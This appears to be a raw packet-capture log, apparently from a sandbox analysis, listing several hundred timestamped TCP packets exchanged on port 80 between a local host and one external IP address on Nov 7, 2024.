Nov 7, 2024 04:12:27.288516045 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.288535118 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.288566113 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.288676977 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.288687944 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.288700104 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.288710117 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.288721085 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.288729906 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.288729906 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.288741112 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.288764954 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.288789988 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.291347027 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.291358948 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.291394949 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.291399956 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.291405916 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.291413069 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.291436911 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.291446924 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.291464090 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.291475058 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.291484118 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.291505098 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.291521072 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.291569948 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.291587114 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.291596889 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.291610956 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.291610956 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.291625023 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.291632891 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.291635036 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.291659117 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.291680098 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.291682959 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.291692972 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.291724920 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.291734934 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.291918039 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.291928053 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.291938066 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.291963100 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.291987896 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.291990042 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.292000055 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.292010069 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.292020082 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.292027950 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.292047024 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.292051077 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.292062044 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.292068958 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.292072058 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.292083979 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.292088032 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.292115927 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.292115927 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.292128086 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.292181015 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.292191982 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.292201996 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.292212009 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.292221069 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.292227030 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.292232037 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.292232037 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.292243004 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.292249918 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.292267084 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.292277098 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.292298079 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.437433958 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.437485933 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.437509060 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.437521935 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.437541962 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.437547922 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.437555075 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.437560081 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.437577963 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.437587023 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.437735081 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.437746048 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.437757015 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.437767029 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.437772036 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.437777996 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.437786102 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.437792063 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.437808990 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.437819004 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.437827110 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.437834978 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.437839031 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.437849998 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.437859058 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.437860966 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.437869072 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.437870979 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.437879086 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.437882900 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.437887907 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.437896967 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.437902927 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.437907934 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.437918901 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.437926054 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.437928915 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.437943935 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.437951088 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.437956095 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.437963009 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.437995911 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.438033104 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.438051939 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.438061953 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.438071966 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.438081026 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.438090086 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.438091040 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.438097954 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.438100100 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.438117981 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.438122988 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.438131094 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.438137054 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.438153028 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.438174963 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.438178062 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.438185930 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.438213110 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.438215971 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.438229084 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.438251972 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.438271999 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.438282967 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.438308954 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.438318014 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.438440084 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.438451052 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.438462019 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.438472033 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.438472986 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.438483000 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.438486099 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.438499928 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.438504934 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.438509941 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.438518047 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.438533068 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.438543081 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.438545942 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.438555956 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.438565969 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.438565969 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.438571930 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.438591003 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.438606024 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.438608885 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.438613892 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.438620090 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.438631058 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.438644886 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.438647985 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.438662052 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.438663006 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.438673973 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.438682079 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.438683987 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.438694000 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.438699007 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.438702106 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.438711882 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.438721895 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.438723087 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.438745022 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.438747883 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.438756943 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.438766003 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.438771963 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.438796043 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.438815117 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.438905001 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.438939095 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.438946009 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.438956022 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.438973904 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.438990116 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.439043045 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.439053059 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.439063072 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.439066887 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.439102888 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.439132929 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.439151049 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.439161062 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.439169884 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.439169884 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.439176083 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.439181089 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.439188004 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.439191103 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.439203978 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.439259052 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.439287901 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.439306021 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.439321041 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.439323902 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.439332962 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.439343929 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.439347029 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.439358950 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.439377069 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.439395905 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.439398050 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.439408064 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.439418077 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.439436913 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.439444065 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.439465046 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.439507008 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.439518929 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.439528942 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.439543962 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.439548969 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.439559937 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.439562082 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.439568996 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.439570904 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.439577103 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.439580917 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.439595938 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.439605951 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.439614058 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.439618111 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.439627886 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.439649105 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.439649105 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.439660072 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.439665079 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.439671993 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.439691067 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.439707041 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.439712048 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.439717054 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.439728975 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.439745903 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.439759016 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.439765930 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.439765930 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.439774036 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.439785004 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.439796925 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.439821005 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.439821005 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.440001965 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.440026045 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.440038919 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.440041065 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.440049887 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.440061092 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.440063953 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.440076113 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.440079927 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.440087080 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.440097094 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.440105915 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.440118074 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.440124989 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.440128088 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.440139055 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.440140963 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.440159082 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.440169096 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.440171957 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.440181017 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.440182924 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.440193892 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.440202951 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.440231085 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.440308094 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.440320015 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.440329075 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.440335035 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.440345049 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.440355062 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.440357924 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.440372944 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.440378904 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.440391064 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.440392971 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.440402031 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.440412045 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.440414906 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.440419912 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.440433025 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.440439939 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.440447092 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.440455914 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.440463066 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.440468073 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.440485954 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.440490007 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.440498114 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.440505981 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.440510035 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.440531969 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.440550089 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.441659927 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.441679955 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.441692114 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.441709995 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.441723108 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.441762924 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.441776037 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.441785097 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.441797018 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.441804886 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.441828966 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.441848993 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.441858053 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.441869974 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.441880941 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.441890955 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.441899061 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.441901922 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.441906929 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.441912889 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.441920042 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.441925049 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.441951990 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.441960096 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.441983938 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.441993952 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.442004919 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.442015886 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.442027092 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.442028046 CET	49762	80	192.168.2.4	185.215.113.16
